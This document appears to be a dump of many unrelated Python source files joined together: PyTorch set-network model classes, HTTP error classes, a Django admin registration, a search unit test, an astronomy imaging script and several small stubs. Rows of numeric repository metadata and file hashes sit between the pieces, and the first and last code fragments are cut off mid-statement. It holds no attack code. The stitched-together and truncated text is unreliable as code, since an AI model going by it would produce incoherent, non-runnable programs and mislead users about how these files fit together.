PermEqui2_mean(self.d_dim, self.d_dim),
nn.Tanh(),
PermEqui2_mean(self.d_dim, self.d_dim),
nn.Tanh(),
)
self.ro = nn.Sequential(
nn.Linear(self.d_dim, self.d_dim),
nn.Tanh(),
nn.Linear(self.d_dim, self.z1_dim),
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, x):
phi_output = self.phi(x)
sum_output, _ = phi_output.max(1)
ro_output = self.ro(sum_output)
return ro_output
class G_inv(nn.Module):
def __init__(self, x_dim, d_dim, z1_dim, pool="mean"):
super(G_inv, self).__init__()
self.d_dim = d_dim
self.x_dim = x_dim
self.z1_dim = z1_dim
self.pool = pool
if pool == "max":
self.phi = nn.Sequential(
PermEqui2_max(self.x_dim, self.d_dim),
nn.Softplus(),
PermEqui2_max(self.d_dim, self.d_dim),
nn.Softplus(),
PermEqui2_max(self.d_dim, self.d_dim),
nn.Softplus(),
)
elif pool == "max1":
self.phi = nn.Sequential(
PermEqui1_max(self.x_dim, self.d_dim),
nn.Softplus(),
PermEqui1_max(self.d_dim, self.d_dim),
nn.Softplus(),
PermEqui1_max(self.d_dim, self.d_dim),
nn.Softplus(),
)
elif pool == "mean":
self.phi = nn.Sequential(
PermEqui2_mean(self.x_dim, self.d_dim),
nn.Softplus(),
PermEqui2_mean(self.d_dim, self.d_dim),
nn.Softplus(),
PermEqui2_mean(self.d_dim, self.d_dim),
nn.Softplus(),
)
self.ro = nn.Sequential(
nn.Linear(self.d_dim, self.d_dim),
nn.Softplus(),
nn.Linear(self.d_dim, self.z1_dim),
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, x):
phi_output = self.phi(x)
sum_output, _ = phi_output.max(1)
ro_output = self.ro(sum_output)
return ro_output
class D(nn.Module):
def __init__(self, x_dim, z1_dim, d_dim, o_dim=1):
super(D, self).__init__()
self.d_dim = d_dim
self.x_dim = x_dim
self.z1_dim = z1_dim
self.fc = nn.Linear(self.z1_dim, self.d_dim)
self.fu = nn.Linear(self.x_dim, self.d_dim, bias=False)
self.f = nn.Sequential(
nn.Softplus(),
nn.Linear(self.d_dim, self.d_dim),
nn.Softplus(),
nn.Linear(self.d_dim, self.d_dim),
nn.Softplus(),
nn.Linear(self.d_dim, self.d_dim),
nn.Softplus(),
nn.Linear(self.d_dim, o_dim),
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, x, z1):
y = self.fc(z1) + self.fu(x)
return self.f(y)
class skipD(nn.Module):
def __init__(self, x_dim, z1_dim, d_dim, o_dim=1):
super(skipD, self).__init__()
self.d_dim = d_dim
self.x_dim = x_dim
self.z1_dim = z1_dim
# hid_d = 5*(z1_dim+z2_dim)
hid_d = max(1024, 2 * z1_dim)
self.fc = nn.Linear(self.z1_dim, hid_d)
self.fu = nn.Linear(self.x_dim, hid_d, bias=False)
self.part1 = nn.Sequential(
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d - self.z1_dim),
)
self.sc = nn.Linear(self.z1_dim, hid_d)
self.su = nn.Linear(hid_d - self.z1_dim, hid_d, bias=False)
self.part2 = nn.Sequential(
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d - self.z1_dim),
)
self.tc = nn.Linear(self.z1_dim, hid_d)
self.tu = nn.Linear(hid_d - self.z1_dim, hid_d, bias=False)
self.part3 = nn.Sequential(
nn.Softplus(), nn.Linear(hid_d, hid_d), nn.Softplus(), nn.Linear(hid_d, o_dim)
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, x, z1):
y = self.fc(z1) + self.fu(x)
output = self.part1(y)
y2 = self.sc(z1) + self.su(output)
output1 = self.part2(y2)
y3 = self.tc(z1) + self.tu(output1)
output2 = self.part3(y3)
return output2
class G(nn.Module):
def __init__(self, x_dim, z1_dim, z2_dim):
super(G, self).__init__()
self.z1_dim = z1_dim
self.z2_dim = z2_dim
self.x_dim = x_dim
hid_d = max(250, 2 * z1_dim)
# hid_d = z1_dim+z2_dim
self.fc = nn.Linear(self.z1_dim, hid_d)
self.fu = nn.Linear(self.z2_dim, hid_d, bias=False)
self.main = nn.Sequential(
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, self.x_dim),
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, z1, z2):
x = self.fc(z1) + self.fu(z2)
output = self.main(x)
return output
class skipG(nn.Module):
def __init__(self, x_dim, z1_dim, z2_dim):
super(skipG, self).__init__()
self.z1_dim = z1_dim
self.z2_dim = z2_dim
self.x_dim = x_dim
# hid_d = 5*(z1_dim+z2_dim)
hid_d = 250
self.fc = nn.Linear(self.z1_dim, hid_d)
self.fu = nn.Linear(self.z2_dim, hid_d, bias=False)
self.part1 = nn.Sequential(
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, z2_dim),
)
self.sc = nn.Linear(self.z1_dim, hid_d)
self.su = nn.Linear(self.z2_dim, hid_d, bias=False)
self.part2 = nn.Sequential(
nn.Softplus(), nn.Linear(hid_d, hid_d), nn.Softplus(), nn.Linear(hid_d, x_dim)
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, z1, z2):
x = self.fc(z1) + self.fu(z2)
output = self.part1(x)
x1 = self.sc(z1) + self.su(output)
output1 = self.part2(x1)
return output1
class ALPHA(nn.Module):
def __init__(self, z1_dim):
super(ALPHA, self).__init__()
self.z1_dim = z1_dim
hid_d = min(z1_dim + 50, 100)
# hid_d = z1_dim+z2_dim
self.main = nn.Sequential(
nn.Linear(self.z1_dim, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, 1),
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, x):
output = self.main(x)
return output
def zero_weights_init(m):
if isinstance(m, nn.Linear):
m.weight.data.uniform_(-5e-3, 5e-3)
m.bias.data.fill_(0)
#############################
# not in the original code: #
#############################
class latent_G(nn.Module):
def __init__(self, latent_dim, z1_dim, layers=[256, 512]):
super(latent_G, self).__init__()
model_list = []
model_list.append(nn.Linear(latent_dim, layers[0]))
for i in range(len(layers) - 1):
model_list.append(nn.LeakyReLU(negative_slope=0.2))
model_list.append(nn.Linear(layers[i], layers[i + 1]))
model_list.append(nn.LeakyReLU(negative_slope=0.2))
model_list.append(nn.Linear(layers[-1], z1_dim))
self.model = nn.Sequential(*model_list)
def forward(self, x, labels=None):
return self.model(x)
class latent_D(nn.Module):
def __init__(self, z1_dim, layers=[512, 256]):
super(latent_D, self).__init__()
model_list = []
model_list.append(nn.Linear(z1_dim, layers[0]))
for i in range(len(layers) - 1):
model_list.append(nn.LeakyReLU(negative_slope=0.2))
model_list.append(nn.Linear(layers[i], layers[i + 1]))
model_list.append(nn.LeakyReLU(negative_slope=0.2))
model_list.append(nn.Linear(layers[-1], 1)) # no activation for wgan
self.model = nn.Sequential(*model_list)
def forward(self, x, labels=None, epoch=None):
return self.model(x)
| 30.438547
| 90
| 0.53657
| 1,544
| 10,897
| 3.529145
| 0.073187
| 0.041843
| 0.07194
| 0.050468
| 0.902
| 0.890989
| 0.868967
| 0.842723
| 0.837401
| 0.805652
| 0
| 0.02513
| 0.328072
| 10,897
| 357
| 91
| 30.52381
| 0.719066
| 0.013306
| 0
| 0.7
| 0
| 0
| 0.002807
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086207
| false
| 0
| 0.003448
| 0.006897
| 0.172414
| 0.024138
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad02e90ba120f9f588b2ed63621c0af11e095571
| 32
|
py
|
Python
|
tests/integration/issues/github_1546/good3/helper.py
|
Rohitpandit021/jina
|
f3db4d5e480375d8dc3bceda814ac1963dee76d7
|
[
"Apache-2.0"
] | 15,179
|
2020-04-28T10:23:56.000Z
|
2022-03-31T14:35:25.000Z
|
tests/integration/issues/github_1546/good3/helper.py
|
Rohitpandit021/jina
|
f3db4d5e480375d8dc3bceda814ac1963dee76d7
|
[
"Apache-2.0"
] | 3,912
|
2020-04-28T13:01:29.000Z
|
2022-03-31T14:36:46.000Z
|
tests/integration/issues/github_1546/good3/helper.py
|
Rohitpandit021/jina
|
f3db4d5e480375d8dc3bceda814ac1963dee76d7
|
[
"Apache-2.0"
] | 1,955
|
2020-04-28T10:50:49.000Z
|
2022-03-31T12:28:34.000Z
|
def helper_function():
pass
| 10.666667
| 22
| 0.6875
| 4
| 32
| 5.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21875
| 32
| 2
| 23
| 16
| 0.84
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
ad72cc7d77f64615ecf25526fb0e199e77d840b7
| 220
|
py
|
Python
|
trackMe-backend/src/error.py
|
matth3wliuu/trackMe
|
0fb22bb8adf147fb4d4ed09c5c7253d0e54bf992
|
[
"MIT"
] | 1
|
2022-01-28T06:20:03.000Z
|
2022-01-28T06:20:03.000Z
|
trackMe-backend/src/error.py
|
matth3wliuu/trackMe
|
0fb22bb8adf147fb4d4ed09c5c7253d0e54bf992
|
[
"MIT"
] | null | null | null |
trackMe-backend/src/error.py
|
matth3wliuu/trackMe
|
0fb22bb8adf147fb4d4ed09c5c7253d0e54bf992
|
[
"MIT"
] | null | null | null |
from werkzeug.exceptions import HTTPException
class AccessError(HTTPException):
code = 403
message = "No message specified"
class InputError(HTTPException):
code = 400
message = "No message specified"
| 24.444444
| 45
| 0.736364
| 23
| 220
| 7.043478
| 0.608696
| 0.209877
| 0.197531
| 0.308642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033898
| 0.195455
| 220
| 9
| 46
| 24.444444
| 0.881356
| 0
| 0
| 0.285714
| 0
| 0
| 0.180995
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
a8f5e72095a1dd10dd5c7af5ec8cfe804fa13e5b
| 209
|
py
|
Python
|
search_listview/tests/admin.py
|
arnaldoanez/django-search-listview
|
8b027a6908dc30c6ebc613bb4fde6b1ba40124a3
|
[
"MIT"
] | 13
|
2016-08-30T09:50:28.000Z
|
2021-04-02T06:19:55.000Z
|
search_listview/tests/admin.py
|
unistra/django-search-listview
|
9f18dfd1e6f49ace4f15bc2c8a13097fbe03709c
|
[
"MIT"
] | 2
|
2016-11-15T01:30:51.000Z
|
2017-03-10T23:01:30.000Z
|
search_listview/tests/admin.py
|
unistra/django-search-listview
|
9f18dfd1e6f49ace4f15bc2c8a13097fbe03709c
|
[
"MIT"
] | 7
|
2016-09-01T07:24:53.000Z
|
2020-11-17T16:54:23.000Z
|
from django.contrib import admin
from .models import Provider, Brand, ModelDevice, Device
admin.site.register(Provider)
admin.site.register(Brand)
admin.site.register(ModelDevice)
admin.site.register(Device)
| 26.125
| 56
| 0.822967
| 28
| 209
| 6.142857
| 0.428571
| 0.209302
| 0.395349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076555
| 209
| 8
| 57
| 26.125
| 0.891192
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
d100c398929f7369572530304b6615b87a3fdfe4
| 34
|
py
|
Python
|
segmentation/__init__.py
|
ryskiod/plant-record
|
758b19d7c239b4eab883eeccbf63cf376ed57eae
|
[
"MIT"
] | null | null | null |
segmentation/__init__.py
|
ryskiod/plant-record
|
758b19d7c239b4eab883eeccbf63cf376ed57eae
|
[
"MIT"
] | 5
|
2021-06-02T00:58:50.000Z
|
2021-06-27T03:05:22.000Z
|
segmentation/__init__.py
|
ryskiod/plant-record
|
758b19d7c239b4eab883eeccbf63cf376ed57eae
|
[
"MIT"
] | 2
|
2021-05-16T01:21:22.000Z
|
2021-05-19T13:36:36.000Z
|
from segmentation.predict import *
| 34
| 34
| 0.852941
| 4
| 34
| 7.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 34
| 1
| 34
| 34
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d150e2d26e4067b0386080556d4786d999b1fde9
| 119
|
py
|
Python
|
cointracking/__init__.py
|
dzid26/HEX_stake_importer
|
d80625b2f94400b94171515d9a84587892967286
|
[
"MIT"
] | null | null | null |
cointracking/__init__.py
|
dzid26/HEX_stake_importer
|
d80625b2f94400b94171515d9a84587892967286
|
[
"MIT"
] | null | null | null |
cointracking/__init__.py
|
dzid26/HEX_stake_importer
|
d80625b2f94400b94171515d9a84587892967286
|
[
"MIT"
] | null | null | null |
from .cointracking_csv_builder import CoinTracking_CSV
from .cointracking_hex_stake import add_hex_stake_entries_to_csv
| 59.5
| 64
| 0.92437
| 18
| 119
| 5.555556
| 0.555556
| 0.32
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 119
| 2
| 64
| 59.5
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d16bb935a4f6e1481e0631c3494084bae318de71
| 38
|
py
|
Python
|
linkedrw/linkedr/__init__.py
|
CypherAk007/LinkedRW
|
167b8423f7229fff04ea2cbef6c29cb2ce01fb08
|
[
"MIT"
] | 114
|
2019-05-27T13:43:14.000Z
|
2021-11-30T02:29:01.000Z
|
linkedrw/linkedr/__init__.py
|
CypherAk007/LinkedRW
|
167b8423f7229fff04ea2cbef6c29cb2ce01fb08
|
[
"MIT"
] | 18
|
2019-06-02T15:22:15.000Z
|
2020-10-03T03:54:06.000Z
|
linkedrw/linkedr/__init__.py
|
CypherAk007/LinkedRW
|
167b8423f7229fff04ea2cbef6c29cb2ce01fb08
|
[
"MIT"
] | 16
|
2019-05-28T08:28:47.000Z
|
2021-08-02T09:25:55.000Z
|
from .resume import make_resume_files
| 19
| 37
| 0.868421
| 6
| 38
| 5.166667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 38
| 1
| 38
| 38
| 0.911765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d16f1ead7142ef7a9c346e7887fe2cc5069437d9
| 199
|
py
|
Python
|
python/grammar/test.py
|
trypolis464/random_scripts
|
9832e2b793e49de0bd40c975faaea216eb1903e9
|
[
"MIT"
] | null | null | null |
python/grammar/test.py
|
trypolis464/random_scripts
|
9832e2b793e49de0bd40c975faaea216eb1903e9
|
[
"MIT"
] | null | null | null |
python/grammar/test.py
|
trypolis464/random_scripts
|
9832e2b793e49de0bd40c975faaea216eb1903e9
|
[
"MIT"
] | null | null | null |
# Tests the grammar module.
#
# Copyright (C) 2021, Ty Gillespie. All rights reserved.
# MIT License.
import grammar
print(grammar.plural(1, "bat", "bats"))
print(grammar.plural(2, "bat", "bats"))
| 19.9
| 56
| 0.693467
| 28
| 199
| 4.928571
| 0.75
| 0.173913
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035088
| 0.140704
| 199
| 9
| 57
| 22.111111
| 0.77193
| 0.467337
| 0
| 0
| 0
| 0
| 0.138614
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
0f197eab39ce3f85d3e680a3eb149a27233ed91e
| 3,668
|
py
|
Python
|
tests/core/test_search.py
|
next-franciscoalgaba/python-benedict
|
81ff459304868327238c322a0a8a203d9d5d4314
|
[
"MIT"
] | 365
|
2019-05-21T05:50:30.000Z
|
2022-03-29T11:35:35.000Z
|
tests/core/test_search.py
|
next-franciscoalgaba/python-benedict
|
81ff459304868327238c322a0a8a203d9d5d4314
|
[
"MIT"
] | 78
|
2019-11-16T12:22:54.000Z
|
2022-03-14T12:21:30.000Z
|
tests/core/test_search.py
|
next-franciscoalgaba/python-benedict
|
81ff459304868327238c322a0a8a203d9d5d4314
|
[
"MIT"
] | 26
|
2019-12-16T06:34:12.000Z
|
2022-02-28T07:16:41.000Z
|
# -*- coding: utf-8 -*-
from benedict.core import search as _search
import unittest
class search_test_case(unittest.TestCase):
def test_search_string(self):
d = {
'a': 'Hello world',
'b': 'Hello world!',
'c': {
'd': True,
'e': ' hello world ',
'f': {
'g': 'HELLO',
'h': 12345,
'hello': True,
},
},
'u': 5,
'v': {
'x': {
'y':5,
'z':6,
},
},
'Hello world': 'Hello World',
}
results = _search(d, 'Hello', in_keys=False, in_values=False, exact=True, case_sensitive=True)
self.assertEqual(len(results), 0)
self.assertEqual(results, [])
results = _search(d, 'Hello', in_keys=False, in_values=True, exact=True, case_sensitive=True)
self.assertEqual(len(results), 0)
self.assertEqual(results, [])
results = _search(d, 'Hello', in_keys=False, in_values=True, exact=True, case_sensitive=False)
self.assertEqual(len(results), 1)
self.assertTrue((d['c']['f'], 'g', d['c']['f']['g'], ) in results)
results = _search(d, 'hello', in_keys=True, in_values=True, exact=False, case_sensitive=False)
self.assertEqual(len(results), 6)
self.assertTrue((d, 'a', d['a'], ) in results)
self.assertTrue((d, 'b', d['b'], ) in results)
self.assertTrue((d['c'], 'e', d['c']['e'], ) in results)
self.assertTrue((d['c']['f'], 'g', d['c']['f']['g'], ) in results)
self.assertTrue((d['c']['f'], 'hello', d['c']['f']['hello'], ) in results)
self.assertTrue((d, 'Hello world', d['Hello world'], ) in results)
results = _search(d, 'hello', in_keys=True, in_values=False, exact=False, case_sensitive=False)
self.assertEqual(len(results), 2)
self.assertTrue((d['c']['f'], 'hello', d['c']['f']['hello'], ) in results)
self.assertTrue((d, 'Hello world', d['Hello world'], ) in results)
def test_search_int(self):
d = {
'u': 5,
'v': {
'x': {
'y':5,
'z':6,
},
},
'w': '5',
5: 5,
'5': '5 str',
}
results = _search(d, 5, in_keys=False, in_values=False, exact=True, case_sensitive=True)
self.assertEqual(len(results), 0)
self.assertEqual(results, [])
results = _search(d, 5, in_keys=False, in_values=True, exact=True, case_sensitive=True)
self.assertEqual(len(results), 3)
self.assertTrue((d, 'u', 5, ) in results)
self.assertTrue((d['v']['x'], 'y', 5, ) in results)
self.assertTrue((d, 5, 5, ) in results)
results = _search(d, 5, in_keys=False, in_values=True, exact=True, case_sensitive=False)
self.assertEqual(len(results), 3)
self.assertTrue((d, 'u', 5, ) in results)
self.assertTrue((d['v']['x'], 'y', 5, ) in results)
self.assertTrue((d, 5, 5, ) in results)
results = _search(d, 5, in_keys=True, in_values=True, exact=False, case_sensitive=False)
self.assertEqual(len(results), 3)
self.assertTrue((d, 'u', 5, ) in results)
self.assertTrue((d['v']['x'], 'y', 5, ) in results)
self.assertTrue((d, 5, 5, ) in results)
results = _search(d, 5, in_keys=True, in_values=False, exact=False, case_sensitive=False)
self.assertEqual(len(results), 1)
self.assertTrue((d, 5, 5, ) in results)
| 37.428571
| 103
| 0.509269
| 455
| 3,668
| 4.002198
| 0.116484
| 0.146074
| 0.156507
| 0.151565
| 0.858869
| 0.845689
| 0.83196
| 0.820977
| 0.812191
| 0.79352
| 0
| 0.01816
| 0.309433
| 3,668
| 97
| 104
| 37.814433
| 0.70075
| 0.005725
| 0
| 0.4875
| 0
| 0
| 0.06118
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.025
| false
| 0
| 0.025
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0f2d14a494038df6012554731d504170d85dbe0d
| 97
|
py
|
Python
|
pdip/configuration/services/__init__.py
|
ahmetcagriakca/pdip
|
c4c16d5666a740154cabdc6762cd44d98b7bdde8
|
[
"MIT"
] | 2
|
2021-12-09T21:07:46.000Z
|
2021-12-11T22:18:01.000Z
|
pdip/configuration/services/__init__.py
|
fmuyilmaz/pdip
|
f7e30b0c04d9e85ef46b0b7094fafd3ce18bccab
|
[
"MIT"
] | null | null | null |
pdip/configuration/services/__init__.py
|
fmuyilmaz/pdip
|
f7e30b0c04d9e85ef46b0b7094fafd3ce18bccab
|
[
"MIT"
] | 3
|
2021-11-15T00:47:00.000Z
|
2021-12-17T11:35:45.000Z
|
from .config_parameter_base import ConfigParameterBase
from .config_service import ConfigService
| 32.333333
| 54
| 0.896907
| 11
| 97
| 7.636364
| 0.727273
| 0.238095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082474
| 97
| 2
| 55
| 48.5
| 0.94382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0f5a071104cd7f4e92fa036934d7fe83957da636
| 146
|
py
|
Python
|
src/simmate/calculators/vasp/database/band_structure.py
|
laurenmm/simmate-1
|
c06b94c46919b01cda50f78221ad14f75c100a14
|
[
"BSD-3-Clause"
] | 9
|
2021-12-21T02:58:21.000Z
|
2022-01-25T14:00:06.000Z
|
src/simmate/calculators/vasp/database/band_structure.py
|
laurenmm/simmate-1
|
c06b94c46919b01cda50f78221ad14f75c100a14
|
[
"BSD-3-Clause"
] | 51
|
2022-01-01T15:59:58.000Z
|
2022-03-26T21:25:42.000Z
|
src/simmate/calculators/vasp/database/band_structure.py
|
laurenmm/simmate-1
|
c06b94c46919b01cda50f78221ad14f75c100a14
|
[
"BSD-3-Clause"
] | 7
|
2022-01-01T03:44:32.000Z
|
2022-03-29T19:59:27.000Z
|
# -*- coding: utf-8 -*-
from simmate.database.base_data_types import BandStructureCalc
class MatProjBandStructure(BandStructureCalc):
pass
| 18.25
| 62
| 0.773973
| 15
| 146
| 7.4
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 0.130137
| 146
| 7
| 63
| 20.857143
| 0.866142
| 0.143836
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
0f7585fdad81d4e941ac286a05524fa7f39da373
| 5,006
|
py
|
Python
|
paul_analysis/make_stellar_box_images.py
|
lzkelley/arepo-mbh-sims_analysis
|
f14519552cedd39a040b53e6d7cc538b5b8f38a3
|
[
"MIT"
] | null | null | null |
paul_analysis/make_stellar_box_images.py
|
lzkelley/arepo-mbh-sims_analysis
|
f14519552cedd39a040b53e6d7cc538b5b8f38a3
|
[
"MIT"
] | null | null | null |
paul_analysis/make_stellar_box_images.py
|
lzkelley/arepo-mbh-sims_analysis
|
f14519552cedd39a040b53e6d7cc538b5b8f38a3
|
[
"MIT"
] | null | null | null |
import plotting.images.stellar_images as stellar_images
import matplotlib.pyplot as plt
import simread.readsubfHDF5 as subf
import numpy as np
import glob
npixels=720
for run_base in [#'explicit_feedback_256', \
'explicit_feedback_256_soft', \
# 'explicit_feedback_256_soft_old_dens', \
# 'explicit_feedback_512', \
#'explicit_feedback_512_soft_amd']: #gas_prod1_runs', 'gas_cool_runs', 'gas_adiab_runs', 'dm_runs']:
]:
print "\n\n\n"
print '../'+run_base+'/output/snap*'
snaplist = glob.glob( '../'+run_base+'/output/snap*')
n_snaps = len(snaplist)
print snaplist
for snapnum in [11]: #range(n_snaps): #range(13):
cat = subf.subfind_catalog( '../'+run_base+'/', snapnum, keysel=['GroupPos', 'GroupLenType'] )
for groupnr in range(np.min([10, len(cat.GroupLenType[:,0])] ) ):
if cat.GroupLenType[groupnr,4] > 500:
center = cat.GroupPos[groupnr,:]
print center
fig,(ax1,ax2,ax3)=plt.subplots( 1, 3, figsize=(3,1) )
image = stellar_images.stellar_image( '../'+run_base+'/output/', snapnum, center=center, \
xrange=[-0.01,0.01], yrange=[-0.01,0.01], pixels=npixels , \
cosmo_wrap=True, massmap=True, dust=True, cosmo=True,\
maxden=1.5e6, dynrange=1e3, projaxis=0, unit_length_mpc=True)
ax1.imshow(image )
image = stellar_images.stellar_image( '../'+run_base+'/output/', snapnum, center=center, \
xrange=[-0.01,0.01], yrange=[-0.01,0.01], pixels=npixels , \
cosmo_wrap=True, massmap=True, dust=True, cosmo=True,\
maxden=1.5e6, dynrange=1e3, projaxis=1, unit_length_mpc=True)
ax2.imshow(image )
image = stellar_images.stellar_image( '../'+run_base+'/output/', snapnum, center=center, \
xrange=[-0.01,0.01], yrange=[-0.01,0.01], pixels=npixels , \
cosmo_wrap=True, massmap=True, dust=True, cosmo=True,\
maxden=1.5e6, dynrange=1e3, projaxis=2, unit_length_mpc=True)
ax3.imshow(image )
fig.subplots_adjust( left=0.0, bottom=0.0, top=1.0, right=1.0, wspace=0,hspace=0)
for ax in [ax1,ax2,ax3]:
ax.axis('off')
filename='{:s}_stellar_central_image_WITH_DUST_snap_{:.0f}_group_{:.0f}_res_{:.0f}.png'.format( run_base, snapnum, groupnr, npixels)
print filename
fig.savefig( './plots/'+filename, dpi=npixels )
if True:
fig,(ax1,ax2,ax3)=plt.subplots( 1, 3, figsize=(3,1) )
image = stellar_images.stellar_image( '../'+run_base+'/output/', snapnum, center=center, \
xrange=[-0.01,0.01], yrange=[-0.01,0.01], pixels=npixels , \
cosmo_wrap=True, massmap=True, dust=False, cosmo=True,\
maxden=1.5e6, dynrange=1e3, projaxis=0)
ax1.imshow(image )
image = stellar_images.stellar_image( '../'+run_base+'/output/', snapnum, center=center, \
xrange=[-0.01,0.01], yrange=[-0.01,0.01], pixels=npixels , \
cosmo_wrap=True, massmap=True, dust=False, cosmo=True,\
